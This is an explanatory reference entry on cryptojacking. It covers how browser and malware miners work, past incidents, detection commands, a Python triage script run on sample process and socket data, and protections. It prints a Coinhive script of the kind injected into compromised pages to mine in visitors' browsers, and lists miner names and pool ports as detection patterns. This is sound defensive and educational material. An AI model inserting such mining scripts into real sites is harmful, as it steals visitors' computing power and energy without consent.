# Cryptojacking

The unauthorized use of another person’s computing power for cryptocurrency mining, without the owner’s knowledge. It is usually carried out via browser scripts or malware and is recognizable by an unexpected spike in CPU usage. The result is high energy costs and system wear and tear.

Cryptojacking refers to the unauthorized use of third-party computing resources to mine cryptocurrencies (mostly Monero, since it can be mined profitably on ordinary CPUs and its transactions are hard to trace). Attackers do not need their own infrastructure; they simply "steal" the computing power of millions of infected devices.
## How Cryptojacking Works

### Browser-Based Cryptojacking
The classic example was Coinhive (2017–2019): a JavaScript library that mined Monero in the browser—sometimes with the website owner’s knowledge as an “alternative to advertising,” but often without.
```html
<!-- Malicious script embedded in a compromised web page -->
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  // 'wallet-address' is a placeholder for the attacker's Coinhive key
  var miner = new CoinHive.Anonymous('wallet-address');
  miner.start();
</script>
```

For the website visitor: CPU usage jumps to 90%+ and the fan starts spinning.
**Today:** Coinhive has shut down, but successors exist. Browser mining has become less popular because browsers block known mining scripts and AV detection has improved.
### Malware-based Cryptojacking
Malware such as **XMRig** is installed on compromised systems:
- **Infection vector:** Unpatched servers, phishing, supply chain
- XMRig (Monero miner) is installed as a service
- Runs 24/7 with throttled CPU (70–80% instead of 100%—to avoid detection)
- Mines Monero and sends it to the attacker’s wallet
**Known cases:**
- Tesla (2018): Kubernetes admin console openly accessible → Crypto miner installed
- WannaMine (2018): Used EternalBlue (NSA exploit) for distribution → Monero mining
- Prometei botnet: Compromised exchange servers via ProxyLogon
## Detection
**Symptoms:**
- Unexpected, sustained CPU spike (> 70–80% without known load)
- Increased energy costs
- System overheating
- Slower applications
**Technical Detection:**
```bash
# Linux: check processes with high CPU usage
top -o %CPU
ps aux --sort=-%cpu | head -20

# Established outbound connections to ports commonly used by mining pools
# (ss -l would only list listening sockets, so it is omitted here)
# Mining pool ports: often 3333, 4444, 14444
ss -tnp | grep -E ':(3333|4444|5555|7777|14444)\b'

# Unknown scheduled tasks and services
crontab -l
systemctl list-units --type=service --state=running
```

**In enterprise environments:**
- SIEM rule: CPU > 90% for > 30 minutes on server
- DNS monitoring: Queries to known mining pool domains
- EDR detects XMRig and similar tools
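The three detection ideas above (high-CPU processes, connections to pool ports, and a sustained-CPU SIEM rule) can be combined into a small triage script. The following is an added example, not code from the original page; the `ps aux --sort=-%cpu` and `ss -tnp` output it parses is hand-constructed sample data, and the thresholds (70% per-process CPU, 90% for more than 30 one-minute samples, the pool port list) are taken from the text.

```python
"""Added example: apply the page's detection ideas to constructed sample data.

Assumptions (not from the page): the SAMPLE_PS and SAMPLE_SS strings below are
hand-written to look like `ps aux --sort=-%cpu` and `ss -tnp` output.
"""
import re
from dataclasses import dataclass

# Ports named on the page as commonly used by mining pools.
POOL_PORTS = {3333, 4444, 5555, 7777, 14444}

# Miner binaries commonly flagged by EDR (the page names XMRig).
SUSPECT_NAMES = ("xmrig", "minerd", "cpuminer")

# Constructed sample of `ps aux --sort=-%cpu | head` output.
SAMPLE_PS = """\
USER   PID %CPU %MEM     VSZ    RSS TTY STAT START   TIME COMMAND
root  4412 78.3  1.2  812340  49012 ?   Ssl  02:10 412:11 /tmp/.x/xmrig -o pool.example:3333
www   1203  3.1  0.8  233120  31200 ?   S    Jan01   5:02 nginx: worker process
mysql  955  1.4  9.9 1900000 402100 ?   Ssl  Jan01  44:10 /usr/sbin/mysqld
"""

# Constructed sample of `ss -tnp` output (established TCP sockets with owner).
SAMPLE_SS = """\
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
ESTAB 0      0      10.0.0.5:51234     203.0.113.9:3333  users:(("xmrig",pid=4412,fd=7))
ESTAB 0      0      10.0.0.5:443       198.51.100.2:52311 users:(("nginx",pid=1203,fd=12))
ESTAB 0      0      10.0.0.5:3306      10.0.0.7:41222    users:(("mysqld",pid=955,fd=30))
"""


@dataclass
class Finding:
    pid: int
    reason: str


def high_cpu_processes(ps_output, threshold=70.0):
    """Return (pid, cpu, command) for rows above the CPU threshold or with a
    known miner name in the command line."""
    hits = []
    for line in ps_output.splitlines()[1:]:          # skip header row
        parts = line.split(None, 10)                  # COMMAND keeps its spaces
        if len(parts) < 11:
            continue
        pid, cpu, cmd = int(parts[1]), float(parts[2]), parts[10]
        if cpu >= threshold or any(n in cmd.lower() for n in SUSPECT_NAMES):
            hits.append((pid, cpu, cmd))
    return hits


def pool_port_connections(ss_output):
    """Return (pid, process, peer_port) for established sockets whose peer
    port is in POOL_PORTS."""
    hits = []
    for line in ss_output.splitlines()[1:]:
        parts = line.split()
        if len(parts) < 6 or not parts[0].startswith("ESTAB"):
            continue
        peer_port = int(parts[4].rsplit(":", 1)[1])
        owner = re.search(r'"([^"]+)",pid=(\d+)', parts[5])
        if peer_port in POOL_PORTS and owner:
            hits.append((int(owner.group(2)), owner.group(1), peer_port))
    return hits


def sustained_high_cpu(samples, threshold=90.0, minutes=30):
    """SIEM-style rule: True once host CPU stays above `threshold` for more
    than `minutes` consecutive one-minute samples."""
    run = 0
    for cpu in samples:
        run = run + 1 if cpu > threshold else 0
        if run > minutes:
            return True
    return False


def triage(ps_output, ss_output):
    """Combine the per-process and network checks into a list of findings."""
    findings = [Finding(pid, f"high CPU {cpu}%: {cmd}")
                for pid, cpu, cmd in high_cpu_processes(ps_output)]
    findings += [Finding(pid, f"{proc} connected to pool port {port}")
                 for pid, proc, port in pool_port_connections(ss_output)]
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_PS, SAMPLE_SS):
        print(f"pid {f.pid}: {f.reason}")
    print("sustained host CPU alert:", sustained_high_cpu([95.0] * 40))
```

On the constructed sample, both checks converge on the same PID, which is the signal a responder wants: a high-CPU process that also talks to a pool port is far stronger evidence than either symptom alone. The `sustained_high_cpu` rule is the host-level counterpart for a SIEM that only receives periodic CPU metrics rather than process lists.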
## Impact on Businesses
- Energy costs: Servers running cryptominers consume 200–300% more power
- Hardware wear and tear: Continuous full load accelerates CPU aging
- Performance degradation: Critical applications are slowed down
- Indicator of a larger breach: Cryptojacking shows that attackers already have access—often a "harmless" use of that access until ransomware looks more profitable

## Protection

- Patching: EternalBlue, ProxyLogon, and Log4Shell were the main entry points in known cases
- EDR: Behavior-based detection of mining processes
- Browser extensions: MinerBlock and NoCoin block browser mining
- DNS filtering: Block known mining pool domains
- Kubernetes hardening: Admin consoles not publicly accessible
- Network monitoring: Anomalous outbound connections to pool ports